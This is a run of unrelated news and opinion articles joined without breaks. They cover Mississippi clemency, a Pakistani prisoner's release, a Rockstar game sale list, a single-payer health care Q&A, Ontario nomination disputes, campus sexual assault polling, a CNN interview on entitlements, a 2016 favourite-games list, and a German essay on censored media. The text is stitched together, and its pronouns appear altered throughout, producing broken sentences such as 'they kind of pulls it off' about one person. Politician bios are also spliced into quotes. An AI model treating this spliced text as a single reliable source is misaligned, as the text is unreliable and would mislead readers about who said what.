In the court of public opinion, Hood is clearly winning. Barbour, who as of two days ago returned to life as a lobbyist and lawyer, seemed content to let their legacy stand. “I am very comfortable with the decisions I made during my term as Governor as to clemency,” they said. “All this is consistent with the powers given the governor by our Constitution, and I am fully confident the pardons and other clemency are all valid.” Hood, though, accused Barbour of trying to live above the law. “He's tried to rule the state like Boss Hogg and they didn't think the law applied to him,” Hood told CNN, referring to the villain in the Dukes of Hazzard series. “This isn't a partisan issue. Either you followed the constitution or you didn't.”
Ultimately, Barbour is betting that Mississippians, accustomed to 11th hour gubernatorial pardons, don't really care about a bunch of ex-convicts and that the glare of the national klieg lights will go away when the next big story breaks. Hood is betting that Mississippians will no longer stand for such outdated practices. But given that the Mississippi legislature tried and failed to curb Barbour's clemency powers when they pardoned four convicted killers in 2008, Hood and the Democrats may be facing an uphill battle to keep the outrage going long enough to force a change in the law.
Warangal, Aug 19 (PTI) A Pakistani prisoner lodged at the Warangal Central Jail here was today released from the prison.
Arshad Muhammad was handed over to Habits police personnel of Hyderabad by jail superintendent M Sampath.
According to Sampath, though Arshads term ended in August last year and the Indian government permitted them to go back to their country, they could not return as the Pakistani government did not respond to their case which delayed the documentation process.
Arshad then appealed to External Affairs Minister Sushma Swaraj to help them to go-back to their country, and it took one year for them to receive the clearances.
53-year-old Arshad was sent to jail in 2009 after they were found guilty of treason and spying for Pakistan.
They served sentence at the Chentalguda prison and was later shifted to Warangal Central Prison due to security reasons.
Their jail term had ended on August 16, 2016, but they did not get the required permission from Pakistan, said the jail official.
Sampath said, "The Ministry of Home Affairs has issued orders asking the Police to hand them over at the Wagah Border." PTI COR RMT
The Warriors, Manhunt and Midnight Club all discounted this week
Add to your backlog and fill those gaps in your digital library as a host of Rockstar titles will be on offer at low prices this week. There's a lot to pick from, such as timeless PS2 classic Grand Theft Auto: San Andreas or more recent titles including shooter Max Payne 3.
Offers run 19th March until 26th March 2014
PS3
GTA IV: The Complete Edition
Was £24.99/€34.99/AU$44.95, now £7.99/€9.99/AU$14.45
Not available in Kuwait, Qatar, Saudi Arabia, UAE
Grand Theft Auto IV
Was £19.99/€24.99/AU$29.95, now £5.49/€6.99/AU$10.35
Not available in Kuwait, Qatar, Saudi Arabia, UAE
Grand Theft Auto: The Ballad of Gay Tony
Was £11.99/€14.99/AU$21.95, now £3.99/€4.99/AU$7.35
Not available in Kuwait, Qatar, Saudi Arabia, UAE
Grand Theft Auto: The Lost and Damned
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Not available in Kuwait, Qatar, Saudi Arabia, UAE
GTA Episodes from Liberty City
Was £15.99/€19.99/AU$24.95, now £4.79/€5.99/AU$8.85
Not available in Kuwait, Qatar, Saudi Arabia, UAE
GTA IV Episodes Bundle
Was £15.99/€19.99/AU$29.95, now £5.49/€6.99/AU$10.35
Not available in Kuwait, Portugal, Qatar, Russia, Saudi Arabia
Max Payne 3
Was £15.99/€19.99/AU$24.95, now £5.99/€7.49/AU$11.05
Max Payne 3 Rockstar Pass
Was £11.99/€14.99/AU$21.95, now £3.99/€4.99/AU$7.35
Offers run from 19th March until 2nd April 2014
PS2
Canis Canem Edit (Bully)
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Not available in Kuwait, Saudi Arabia, UAE
Grand Theft Auto 3
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Not available in Saudi Arabia, UAE
Grand Theft Auto: Vice City
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Not available in Germany, Saudi Arabia, UAE
Grand Theft Auto San Andreas
Was £11.99/€14.99/AU$21.95, now £5.49/€6.99/AU$10.35
Not available in Saudia Arabia, UAE
GTA: Liberty City Stories
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Not available in Saudi Arabia, UAE
GTA: Vice City Stories
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Not available in Saudi Arabia, UAE
Manhunt
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Not available in Australia, Germany, Kuwait, New Zealand, Qatar, UAE
Max Payne
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Midnight Club
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Midnight Club 2
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Midnight Club 3: Dub Remix
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Red Dead Revolver
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
The Warriors
Was £7.99/€9.99/AU$14.45, now £3.99/€4.99/AU$7.35
Not available in Germany, Kuwait
PSP
Grand Theft Auto: Chinatown Wars
Was £10.99/€14.99/AU$17.95, now £5.49/€6.99/AU$10.35
Not available in Saudi Arabia, UAE
Grand Theft Auto: Vice City Stories [PSP]
Was £11.99/€14.99/AU$21.95, now £5.49/€6.99/AU$10.35
Not available in Saudi Arabia, UAE
GTA: Liberty City Stories [PSP]
Was £11.99/€14.99/AU$21.95, now £5.49/€6.99/AU$10.35
Not available in Saudi Arabia, UAE
Manhunt 2 [PSP]
Was £6.49/€7.99/AU$11.75, now £3.19/€3.99/AU$5.85
Not available in Australia, Germany, Ireland, Kuwait, New Zealand, Qatar, UAE
Midnight Club 3: DUB Edition [PSP]
Was £9.99/€12.99/AU$18.45, now £4.79/€5.99/AU$8.85
Not available in Bulgaria, Hungary, Kuwait, Qatar
Midnight Club L.A. Remix [PSP]
Was £9.99/€12.99/AU$18.45, now £4.79/€5.99/AU$8.85
Not available in Bulgaria, Croatia, Hungary, Kuwait, Qatar
The Warriors [PSP]
Was £6.49/€7.99/AU$11.75, now £3.19/€3.99/AU$5.85
Not available in German, Kuwait
by
Professor Navarro has taught at the Johns Hopkins University for many years.  They are the Director of the JHU-UPF Public Policy Center and has been advisor to many national organizations and international organizations, including the WHO and the UN. They were a member of the White House Health Care Task Force in 1993 and Senior Advisor to Jesse Jackson's Campaign in the Democratic Primaries in 1984 and 1985.
Single-payer means that most of the funds used to pay for medical care are public, that is, they are paid with taxes. The government, through a public authority, is the most important payer for medical care services and uses this power to influence the organization of health care. The overwhelming majority of developed countries have one form or another of a single-payer system. The US is the only country that does not have a single-payer system. This is one reason why medical care is so expensive (the US spends $9,698 per capita in medical care, much more than any other country; Sweden spends $5,000, Germany $4,720, Canada $4,430, France $4,120, the UK $3,240, and Japan $3,240); inefficient (by far, the US has the highest percentage of unnecessary medical procedures, including surgery, in the developed world); and extremely unpopular (nearly 40% of the US population believes the country's medical care should be reformed completely, vs. only 12% of Canadians and British). US medical care is also extremely cruel and insensitive. Almost 40% of people with terminal conditions, which means they are dying, worry about how they or their families are going to pay for their care.
Why is the US in this situation?
The usual answer is that the majority of funding is private: 48% of funding is public and the majority, or 52%, is private. These percentages, however, are misleading. David Himmelstein and Steffie Woolhandler, founders of Physicians for a National Health Program, have shown that taking into account the subsidies the government pays to health insurance companies through tax exemptions for their premiums, the overwhelming funding of health services is public.
Why, if health funding is public, do we still have the situation I described?
This situation exists because the majority of medical care is managed by insurance companies whose primary objective is to make money for their managers and stockholders. The health insurance industry makes huge amounts of money, and health insurance company CEOS are among the best paid individuals in this country. Steve Hemsley, CEO of United, makes an annual compensation of $66 million, or $254,328 a day. And they are no exception. There is an enormous amount of administration costs to cover the expenses of administrators. Since 1990, the number of administrators (i.e., those involved in paper shuffling) has increased almost 60 times faster than the number of medical professionals.
The other sector of the US medical system that also makes a huge amount of money is the pharmaceutical industry, one of the most profitable businesses in the US, with profit rates five times higher than the profit rate of the median Fortune 500. One reason the industry is so profitable is that it basically sets the prices of drugs it sells to the government. By law, the government has to accept the price defined by the pharmaceutical industry. This scandalous situation happens nowhere else in the Western world.
But the explanation usually provided by the media is that people like the system as it is.
That is not true. The US has the largest percentage of citizens profoundly unhappy with their country's medical care system. Almost 35% of people indicate that the medical care system should be reformed completely. Canada only has 12% of people who feel that way. Since 2009, the majority of people (54%) have preferred to have a national medical care system that is publicly funded. Even a higher percentage, 77%, believe the government should provide quality medical coverage to all adults.
Could the reason that medical care is so expensive in the US be due to the fact that it is used more frequently in the US than in other countries?
No. The facts show otherwise. The US has one of the lowest rates of physician visits per capita (4 per year), lower than Denmark (4.5), the UK (5), France (6.4), Australia (7.3), Canada (7.7), and Japan (12.6), to name a few.
What about having more health professionals? Could this be the reason for higher expenditures?
No. As a matter of fact, the number of health professionals, like nurses, is smaller in the US than in other countries with a comparative level of economic development. In the US, there are 11.1 nurses per 1,000 individuals. Ireland has 12.4, Germany 12.8, Australia 12.8, Denmark 17.6, and Norway 19.9, among others.
Could it be that the US population uses hospitals more frequently than citizens in other countries?
Again, no. Hospitalized days per person in the US are one of the lowest among countries of comparable economic development, at 0.6 days per year, less than the UK (0.7 days), Australia (0.8 days), France (0.9 days), and Switzerland (0.9 days).
Could it be because we have a higher percentage of elderly people, who in general utilize health services more than other age groups?
Again this argument does not have any validity, because the percentage of people who are 65 years and older is lower than the percentage in similar countries. In the US, this group constitutes 14.5% of the population, while in Canada it is 15.6%, the UK 17.6%, France 17.7%, Sweden 19.3%, Germany 20.8%, Italy 21.4%, and Japan 26.0%. In all these countries, the utilization of medical services is much larger, and the percentage of elderly is also much larger. At the same time, medical care expenditures are much lower, while providing more extensive health benefits coverage than in the US.
What should be done?
The solution is fairly easy to see. We can see in other countries what should be done in the US. Look, for example, to Canada. The great advantage of Canada is that our neighboring country used to have the same system of funding as the US, including the same insurance companies. But it decided to change, establishing a national medical care program that could be funded publicly, using the power of being the single-payer for services to influence the organization of health services, including doctors' offices and hospitals, which continued to be, for the most part, in the private sector. The system eliminated the insurance companies as intermediaries and was able to provide more comprehensive coverage at lower costs than in the US.
How did they do it?
Fairly simple. Employers and employees stopped paying premiums to insurance companies and, instead, paid directly to the public authority, which paid the providers. Rather than paying premiums to insurance companies, they paid taxes to the public authority, which is the entity directly negotiating with providers.
But what about candidates in the primaries who say that with single-payer, people will pay higher taxes?
Yes, this will indeed be the case. But what those who criticize single-payer do not say is that while people will pay higher taxes, these taxes will be a great deal lower than the premiums for which the taxes will be substituting. In other words, the American population will be paying considerably less and will gain considerably more. That is the reality that they do not mention.
Where will the money be coming from? Where will the savings originate?
Savings will originate from many sources. One will be the reduction of outrageous overhead costs of the insurance companies that go to pay for large CEO salaries, marketing, large administrative staffs, and large infrastructure. The US spends $829 per capita in insurance overhead alone. Canada's overhead for administrating its medical care system is only $160 per capita. Imagine the amount of savings if we were to have a single-payer system like Canada. Another source of savings is the considerable decline in the prices in pharmaceuticals. The list of potential savings is enormous.
Why can we not have a similar program?
Because the 1% of the corporate class, or what is being called the billionaire class, has enormous power, unparalleled in any other country. In the US, it is not only the funding of medicine that is privatized, but also the electoral process. Most of the money used by candidates for public office comes from the business class, including the insurance companies. This is the root of the problem, because the billionaire class does not want to have a national health program, and they control the executive and legislative branches of the federal government.
And why do they not want a national health system?
The health insurance-based system allows the class of employers to control the workers and employees who work for them. Remember that when workers are fired, they lose not only their salary but also the medical care coverage of their family. This is one reason the US has the lowest number of working days lost due to strikes. The current dependency of health care coverage on employment is very useful to the class of employers in imposing labor discipline. The employer class has influence in the US Congress.
Another group within the billionaire class that benefits from and fights to maintain the current system is, of course, the insurance companies, who make a lot of money from the medical care system. The class alliance between industrial capital and financial capital has been critical for the maintenance of the current system.
What could be done?
The working population of this country, which has different and frequently opposed interests to the billionaire class, has to mobilize to be able to change the political system and forbid the country's billionaire class from buying its political class. This mobilization, through the development of socialist, class-based parties, must take place to be able to reach a national health program. The experience of Canada is particularly relevant. It was a socialist party that initiated the single-payer in the province of Saskatchewan. As in the majority of countries that have single-payer, the socialist parties were the ones that introduced policies that influenced single-payer systems.
Is this possible in the US?
It is difficult, but not impossible. The primary problem is private funding of the electoral process, which corrupts democracy to the bone. Another problem is the lack of proportional representation that imposes a bi-party system: the Republican and Democratic Parties. The Republican Party today is a very conservative party, to put it mildly. The Democratic Party was rooted in the New Deal Transition, but has distanced itself from that tradition and has been moving more to the right. Neither of them are left-wing parties. Actually, very few people seem to know that the Democratic Party belongs, as an observer, to the International Association of Liberal Parties. These parties have been funded in each country by their “employer class” (“liberal” in Europe has a very different meaning than in the US; “liberal” in Europe is someone like President Reagan, the opposite of what it means in the US, where “liberal” is like Reverend Jesse Jackson Senior, whose policies are more similar to European social democracy). This fact shows you the nature of the challenge. The supposedly left party in the US is to the right of the Conservative Parties in many European countries. There is not a major socialist party in the US, and we pay a cost for it. This is not a partisan observation. It is a scientific one. The evidence for this is overwhelming.
Most of the facts presented in this Q&A are from the Physicians for a National Health Program resources.
And then there were three. A third Progressive Conservative nomination is now being formally challenged by party activists.
Rick Dykstra, Ontario PC Party president, declared that Ben Levitt won the four-contestant nomination fairly and will be the party's candidate in the June 7, 2018 election. ( Dave Chan / for Toronto Star file photo )
Supporters of Vikram Singh, who lost the May 7 Conservative nomination in Hamilton West-Ancaster-Dundas, have served senior PC officials with a notice of appeal. According to legal documents being filed with the Ontario Superior Court of Justice, Singh's campaign alleges “gross irregularities and voter fraud” at the marathon six-hour nomination meeting. The allegations have not been proven in court and party president Rick Dykstra has declared that Ben Levitt won the four-contestant nomination fairly and will be the party's candidate in the June 7, 2018 election.
Article Continued Below
But the documents, which were served to party officials last Wednesday, allege there were problems at the nomination meeting's credentials desk that hurt Singh's candidacy. Named in the action are Dykstra, PC executive director Bob Stanley, and staffer Logan Bugeja. It's the latest problem to jolt the Tories, whose popularity in public opinion polls has led to surge of interest in running for the party next year. As first disclosed by the Star, PC activists in the ridings of Newmarket-Aurora and Ottawa West-Nepean are also challenging the results of their recent nominations. To prevent any future problems and curb the growing pains, Conservative Leader Patrick Brown has hired private-sector auditors PwC to oversee nominations going forward.
“We've never seen so many memberships being sold. There is this massive appetite for change in Ontario, and, because of that, we've never had so many candidates, so many contested nominations,” Brown said Monday. “For me, given the fact that we're seeing nominations that are more energized than ever before, I thought engaging PwC would help let anyone know that there's a neutral arbiter there,” they said, referring to the firm that is also known as PricewaterhouseCoopers.
Article Continued Below
“We had three nominations (last weekend), heard no complaints. Ultimately I have to sign the nominations and I've told the party that I want PwC to sign off on the best practices.” Aside from the Tories' 29 MPPs, the party has nominated 34 candidates for next year's election.
Read more about:
A third of female students in Britain have endured a sexual assault or unwanted advances at university, stark new research conducted for The Telegraph shows.
It comes as new legal guidance warned that universities and colleges across the UK could be breaking the law by refusing to investigate allegations of indecent assault or rape, believing that it is purely a police matter.
Gender violence campaign groups warned that academic authorities are creating an “environment of impunity” on campus by refusing to step in to protect women from assault. The Telegraph is planning to highlight the issue in a series of articles .
The polling, carried out by YouthSight, the specialist research group, showed that as many as half of female students and a third of their male counterparts knew of a friend or relative who has experienced intrusive sexual behaviour ranging from groping to rape.
It found that 31 per cent of female students polled said they had been the victim of “inappropriate touching or groping” and around one in 20 had experienced more intimate but unwelcome advances or been pressurised into sexual activity. Overall 34 per cent indicated they had experienced some form of assault or abuse.
Meanwhile one in eight male students had also been subjected to groping or unwanted advances. One per cent of students of either gender said they had been raped at university.
But, significantly, almost half (43 per cent) of the women who had experienced sexual assault or abuse at university, did not report their ordeal, even to friends or family. And six in 10 male victims also said they had not told anyone.
It came as a new legal briefing commissioned by the End Violence Against Women Coalition, an alliance of charities and campaign groups, warned that higher education institutions are avoiding their legal responsibilities by refusing to investigate sexual assault allegations.
It argues that the governing bodies of higher and further education institutions count as “public authorities” and therefore subject to both the Human Rights Act and the Public Sector Equality Duty, which imposes legal obligation on public bodies including eliminating discrimination and harassment against women.
The report's author, Louise Whitfield, a partner at Deighton Pierce Glynn and specialist in public law, said: “UK universities whose policies at present would lead them for example not to investigate a rape allegation and to regard it as purely a police matter, are failing to protect women students and are very likely to be in breach of the law.
“Similarly, the law is clear that higher and further education institutions should be proactively seeking to ensure women students are safe and equal while they study.”
Sarah Green, director of the EVAW Coalition, said: “We currently have a situation where women in the workplace are accorded more protection than young women who live as well as study at university.
“We know that some women students have dropped out of university following abuse that was not adequately dealt with by the institution.
“This cannot be allowed to continue.”
Professor Kevin Fenton, Director of Health and Wellbeing at PublicHealth England, said:
“The research around sexual coercion and assault in universities is clear and rapidly growing.
“It is unacceptable that a third of women and 12 per cent men said they had faced unwelcome sexual advances.
“Everyone is entitled to a life free of violence and abuse.
“It is crucial that those on the ground, the students, feel confident and safe enough to take active steps when they witness a problem, or experience domestic harassment themselves.”
Do you have concerns about sexual assault at university? The Telegraph is planning a series of articles covering this issue, so please send your stories and comments to telegraphfeatures@telegraph.co.uk
CNN host Jake Tapper questioned a Republican senator on Wednesday as to how the GOP could talk about curbing growth to Medicare and Medicaid just after passing the Republican tax bill.
In an interview with Sen. Pat Toomey Patrick (Pat) Joseph ToomeyOvernight Defense: Pick for South Korean envoy splits with Trump on nuclear threat | McCain blasts move to suspend Korean military exercises | White House defends Trump salute of North Korean general WH backpedals on Trump's 'due process' remark on guns Top GOP candidate drops out of Ohio Senate race MORE (R-Pa.), Tapper questioned how Toomey and other Republicans could talk about making cuts to federal entitlement programs while simultaneously giving "a huge tax break" to the wealthiest Americans.
ADVERTISEMENT
"We've got entitlement spending that is not sustainable," Toomey explained. "These big spending programs that are growing faster than the economy. You can't tax your way out of that problem. You've got to make some curbs."
"But just to play devil's advocate, you're going to say that about Medicare, and welfare, and Medicaid, and the like just after you gave me and Anderson Cooper a huge tax break?" Tapper responded.
"Yeah, I'm going to defend the proposition that tax reform should be about maximizing economic growth, and if we do that, by the way, then we also maximize revenue," Toomey responded.
"And separately, no matter what you do, whether you're right or wrong on the revenue side, you still have to have a government spending that is growing no faster than the economy," they added. "You have to get that right. So I think we got that done to a very large degree with today's completion of this tax reform, and over time we still need to address these fundamental imbalances in our big entitlement programs."
Republicans in the House and Senate have taken aim at entitlement spending in recent days as Congress works to get the tax-reform plan on President Trump Donald John TrumpHouse committee believes it has evidence Trump requested putting ally in charge of Cohen probe: report Vietnamese airline takes steps to open flights to US on sidelines of Trump-Kim summit Manafort's attorneys say they should get less than 10 years in prison MORE's desk by the end of the year. The House passed a final version of the plan on Wednesday.
“We're going to have to get back next year at entitlement reform, which is how you tackle the debt and the deficit,” House Speaker Paul Ryan Paul Davis RyanBrexit and exit: A transatlantic comparison Five takeaways from McCabe's allegations against Trump The Hill's 12:30 Report: Sanders set to shake up 2020 race MORE (R-Wis.) said earlier this month.
"We have a welfare system that's trapping people in poverty and effectively paying people not to work," Ryan added. "We've got to work on that.”
Janine Hawkins is a games critic based in sunny Canada who enjoys Style Savvy and third-person shooters with equal gusto. You can find them on Twitter @bleatingheart, or catch them on video at streamfriends.tv.
Normally when I reflect on the games I played in a given year, my favourites don't have all that much in common. There'll be the ones that told amazing stories, the ones that pulled off some fabulous technical feat, the ones that scratched some itch just right. At best there's some overlap, where here and there the Venn diagrams connect and exceptional games really shine. But this year I realized that my favourite games of 2016--the ones I couldn't put down or that kept me thinking of them long after they ended--all have something very specific in common. They all have, at some point, swallowed me whole. It's not that they all deeply immersed me and they're also not necessarily “addictive", but these are all games that I piled onto myself like warm winter bedding. Whether it was spread out over the course of a rough month or a palette cleanser during one of those battery-recharging kinds of weekends, these games subsumed me… And given the kind of year 2016 has been, that adds up.
I don't typically have a lot of patience for games that I'm bad at, which is as strong an endorsement as I could ever give Pocket Card Jockey. I've squandered so many good hands, and I've lost so many races. In dentist's offices and on busses, in bed and while minding something on the stove. Sometimes I win, mostly I lose, but still I come back. I keep throwing handfuls of idle and anxious time into it, trying desperately to get my terrible little garbage horse a few trophies for their terrible little garbage horse mantle. Even if I'm destined to be the worst card jockey in the admittedly short history of card jockeys, at least I'm having a good time.
It takes time to play Mystic Messenger properly, and for a while I wasn't sure how much I was willing to give. I came back day after day, rolling my eyes at the heavy-handed and impatient approach to flirtation the game offers. And yet I grew increasingly invested. In a game centered on romance it speaks volumes than an unromanceable character's route became a fan-favourite, but that's the case with the industrious, staid, and wonderful Jaehee. There's no awkward flirtation with her, no dialogue choices that swing between obsessive to aloof. Jaehee's story is hard but hopeful, and the interaction with that character (even the one-sided faux phone calls in the middle of the night) made me glad I saw it through.
I'm not an Overwatch evangelist. I don't play competitively--hell, I don't even play versus humans. I'm not sure if I main anyone, for that matter. That's kind of the beauty of playing against bots, right? You don't have to sacrifice your ego to experiment (or be an indecisive career amateur.) That's how I play Overwatch, but that's also why I was hesitant to include it on my list. I don't feel like I play it the way I think someone who thinks it ranks “should” play it... And that's a bullshit thing to say. I'd never accept someone else saying that the way they play something shouldn't or doesn't “count”, so why should I do it myself? The fact is that I still play Overwatch almost every day, sometimes for hours and sometimes just for a few minutes when I need to look at anything other than a word processor for a bit. It fits into my life so easily, doesn't make me motion-sick (something that keeps me on the bench with quite a few other shooters) and is downright relaxing without the anxiety that can come from competition. It might not be the way everyone else enjoys it, but it works for me.
If Overwatch is my shoot-bots-and-chill game then Hitman might be the exact opposite. Usually I come to it when I'm really wired, really tense, and know full well that I shouldn't. I know it'll only make all of those things worse. I know it's 4 a.m. and I can't sleep and the smart thing to do would be to make some herbal tea and watch a little YouTube and then go back to bed. But instead of being smart like that, I get up and put on a nightshirt, creep to the computer, and fire up Hitman. I knock six people out with wrenches until I run out of wrenches. Wrenches, hammers, cans, bricks--they're everywhere and yet there are never enough. Not for me. Not for my 4 a.m. assassination fugues. But the house is quiet, I'm the exact level of tired that I'm convinced makes me impulsive enough to get shit done, and I need to know what happens when you toss an exploding golf ball into a gelateria.
I shouldn't enjoy The Tomorrow Children. It's a game that explicitly keeps you from enjoying the fruits of your labour, whisking you off to another struggling town the moment you manage to restore the last. That should be demoralizing. Also it has slide puzzles, and those absolutely are demoralizing. But cooperation feels good. Perfectly distilled and isolated from how many teams themselves can suck, teamwork feels good too. It feels good in a very primitive, very human sense. The way other players phase in and out around you in The Tomorrow Children is odd and jarring at first, but it serves to facilitate that perfect, platonic ideal of cooperation; just a brief peek here and there to remind you that you're all working together. Someone is mining and someone else is moving the ore and crystal to the bus stop and someone else will move it to storage when it arrives back in town. We're all part of a well-oiled engine made of little girls in simple dresses working almost invisibly alongside each other. It gets us nowhere, but it gets us nowhere together.
Even as fashion becomes an increasingly important part of AAA games, it's as tempting as ever to assume games like Style Savvy are insubstantial or exist only to pander to some niche we think we're entitled to sneer at just a little bit. But frankly, I wish every series fought off complacency as actively as Style Savvy seems to, or treated its audience's interests with as much respect. Maybe it just stands out because it's part of a genre that's often guilty of doing the exact opposite and assuming players don't want or need more than what they're already getting. With each installment Style Savvy has expanded and aspired to be different, to become deeper, to offer more and more options to its players. Fashion Forward deserves a tremendous amount of credit for that in particular. Also, an NPC asked me to give them a makeover so she'd look like a tube of toothpaste and honestly, I think they kind of pulls it off.
Even after all the praise it got, I slept on Abzû for months. When I did finally give it a chance, though, there was no stopping me. I consumed it in a single session, and even when I woke up the next morning, I still felt this persistent, lingering awe at what I'd seen. Comparing it to Journey almost sells it Abzû short. Abzû is flight and ballet. It's music and nature. It's a Fantasia suite made playable, from spirited start to roaring climax to soothing end. It's a fucking experience, and one I know I'm going to revisit sooner rather than later.
Developers have been grasping at that Minecraft crown for a while now, but I sure wasn't expecting a Dragon Quest game to be one of the ones that got it right. Frankly, it seemed a little misguided at first, but the makers of Dragon Quest Builders figured out something pretty crucial: Even if you can't have full multiplayer, you can still have a community. You can still give players a purpose in building and gathering without leaving it 100% up to them to find their own inspiration. That may not be what everyone needs, but it's exactly what I do. The most fun I've ever had with Minecraft, Terraria, or even Starbound has been as merely one part of a push-and-pull team. When I needed wood to build, I could trust the friend I was playing with to bring it to me. When they needed metal tools, they could trust me to forge them. It's a simple thing to have NPCs ask favours of you as they toil away producing food and items for you in return, but that reciprocity goes a long way to making Dragon Quest Builders feel like way more than just another blocky sandbox.
It's not that Stardew Valley is a close homage to one of my favourite game franchises ever, but that it improves on so much. Things I'd been dying to see added or changed in Harvest Moon/Story of Seasons for well over a decade, and even things I didn't realize could be improved upon in the first place. It takes a lot more than cows and turnips to make farming RPGs really work, and Stardew Valley shows an understanding of that well beyond a surface-level admiration. Stardew more than lives up to the series' that inspired it, but it remains to be seen whether those series' can live up to Stardew going forward.
I had no hopes for Tokyo Mirage Sessions when it was assigned to me for review. I'd seen the trailers and I thought a popstar-infused SMT-meets-Fire Emblem was a novel idea, but if anything I was kind of dreading it. There are few things more arduous and unpleasant than playing a mediocre JRPG on a tight deadline, after all. Fortunately for me Tokyo Mirage Sessions turned out to be anything but mediocre. It keeps its turn-based combat from dragging with flashy action-heavy spectacles, sometimes triggered deliberately and sometimes completely random. Meanwhile, the story seldom hits a lull because the promise of a special scene or performance always feels like it's just around the corner. It's colourful and exciting and energetic and it's a marvel that it never seemed to falter in that. Where I would have normally been relieved to finish a game and start working on my review, I walked out of Tokyo Mirage Sessions #FE ready to walk right back in again. I've managed to put off that second play-through for now, but someday I know I'll need this flashy 50-hour jpop carnival in my life again. It's just a matter of time.
30.11.2017
Gebt das Zensierte frei!
Von Alexander Jäger
Einige indizierte und beschlagnahmte Computerspiele, Horrorfilme und Bücher werden derzeit wieder besser erhältlich. Das ginge noch konsequenter.
Der November 2017 kann als geradezu historischer Monat der Jugendschutzregulierung gewertet werden. Mit „Dead Rising“ wurde erstmals ein bisher beschlagnahmtes Computerspiel wieder freigegeben und auf Listenteil A der indizierten Medien umgetragen. Damit bleibt es zwar noch „jugendgefährdend“ und unterliegt den damit verbundenen Distributionsbeschränkungen (Werbeverbot, Verleih oder Verkauf nur „unter der Ladentheke“), allerdings ist der Verkauf an Erwachsene nun nicht mehr illegal und es liegt durchaus im Bereich des Möglichen, dass aufgrund des stark satirischen Charakters des Spiels auch früher oder später eine Listenstreichung erfolgen wird.
Außerdem hat die nahezu unendliche Geschichte um den pornographischen Roman „Josefine Mutzenbacher oder Die Geschichte einer Wienerischen Dirne von ihr selbst erzählt“ von 1906 nun endlich ihren Abschluss gefunden. Obwohl man nach wie vor Bedenken hatte und eine Jugendgefährdung als durchaus gegeben sah, kam man durch ein literaturwissenschaftliches Gutachten zur Entscheidung, der Kunstfreiheit den Vorrang zu gewähren.
Diese beiden Neubewertungen sind Teil einer schon seit einiger Zeit feststellbaren und für den Freund kontroverser Kulturerzeugnisse sehr erfreulichen Entwicklung: Viele vormals indizierte Medien wurden in den letzten Jahren teils aufgrund abgelaufener Fristen, teils auch, weil die Anbieter eine Neuprüfung erwirkten, wieder freigegeben. Selbst bisher bundesweit beschlagnahmte Filme konnten erfolgreich aus dem Giftschrank geholt werden, so dass berüchtigte Klassiker wie „Tanz der Teufel“, „Mondo Brutale“, einige Teile der „Freitag der 13.“-Reihe oder auch „Das Böse“ nun z. T. schon mit einer Freigabe ab 16 Jahren ungekürzt im Handel erhältlich sind.
„Man hat erkannt, dass die schlimmen Filme von einst inzwischen Klassikerstatus genießen.“
So positiv dieser frische Wind in einem bisher ziemlich verkrusteten System auf den ersten Blick wirken mag, kann man sich jedoch ein wenig Jammern (allerdings auf hohem Niveau) nicht verkneifen. Dies liegt weniger am Unwillen der Jugendschützer von der Bundesprüfstelle für jugendgefährdende Medien (BPjM) – tatsächlich scheint man auch dort erkannt zu haben, dass die schlimmen Filme von einst inzwischen Klassikerstatus genießen bzw. tricktechnisch durchschaubar geworden sind –, sondern an den beträchtlichen bürokratischen Hürden, die die Aufhebung einer Beschlagnahme und die Listenstreichung mit sich bringen.
Im Fall von „Hexen bis aufs Blut gequält“ beispielsweise reichte die Aufhebung des letzten Beschlagnahmebeschlusses nicht aus, sondern es musste separat zunächst jede bisher ausgesprochene Beschlagnahme zurückgenommen werden, bevor die BPjM den Film zunächst auf Liste A umtragen und danach erneut auf eine Jugendgefährdung prüfen konnte. (Solange auch nur eine Fassung eines Films beschlagnahmt ist, bleibt er auf Liste B, die neben der Jugendgefährdung auch noch auf die strafrechtliche Relevanz eines Werks hinweist).
Ein Gerichtsverfahren zur Aufhebung einer Beschlagnahme kostet darüber hinaus natürlich ebenso wie eine Neuprüfung mit dem Ziel der Listenstreichung oder der Gang zur Freiwilligen Selbstkontrolle, um eine rechtssichere Altersfreigabe zu bekommen, viel Geld. Daher stellt es für die Anbieter ein gewisses finanzielles Risiko dar, einen bestimmten Film freizubekommen. Bei einem Klassiker wie „Tanz der Teufel“ ist der anschließende kommerzielle Erfolg einer DVD- oder Blu-ray-Veröffentlichung programmiert, sich hingegen eines der obskureren Streifen (beispielsweise „Magnum Thunderbolt“ oder die beschlagnahmten Trash-Gurken von Jess Franco) anzunehmen, wird mit Blick auf das juristische Prozedere vermutlich vorerst kein Label wagen. Zu klein ist die Zielgruppe, für die sich dieser Aufwand lohnen würde. Zumal der Erfolg eines solchen Aufhebungsverfahrens ja nicht abzusehen ist.
„Die bürokratischen Hürden für die Freigabe der alten Splatter-Schinken sollten einfacher gestalten werden.“
Ein weiteres Problem liegt darin, dass man sich auch nicht einfach entspannt zurücklehnen und auf den Ablauf der Verjährungsfristen warten kann. Zwar ist ein beschlagnahmter Film nach Ablauf von 25 Jahren automatisch wieder frei, durch die zahlreichen Neuauflagen aus dem Ausland, die mit schöner Regelmäßigkeit beim Staatsanwalt landen und wieder eingezogen werden, bleibt ein Film jedoch faktisch für alle Zeiten auf Liste B, sofern sich nicht jemand findet, der einen Prozess auf sich nimmt. Als Beispiel mag hier der Film „Absurd“ dienen: Die alte beschlagnahmte VHS-Kassette ist inzwischen eigentlich wieder legal, da sie vor mehr als 25 Jahren eingezogen wurde. Durch die zahlreichen in der Zwischenzeit erfolgten Beschlagnahmen der Neuauflagen auf DVD wird der Film aber nach wie vor als „strafrechtlich relevant“ geführt ohne Chance, dass sich daran etwas ändern wird. Im Grunde genommen läuft das Spiel nach dem Muster „bereits beschlagnahmt, darum Liste B, anschließend wird das Gericht aktiv und beschlagnahmt erneut“ automatisch ab.
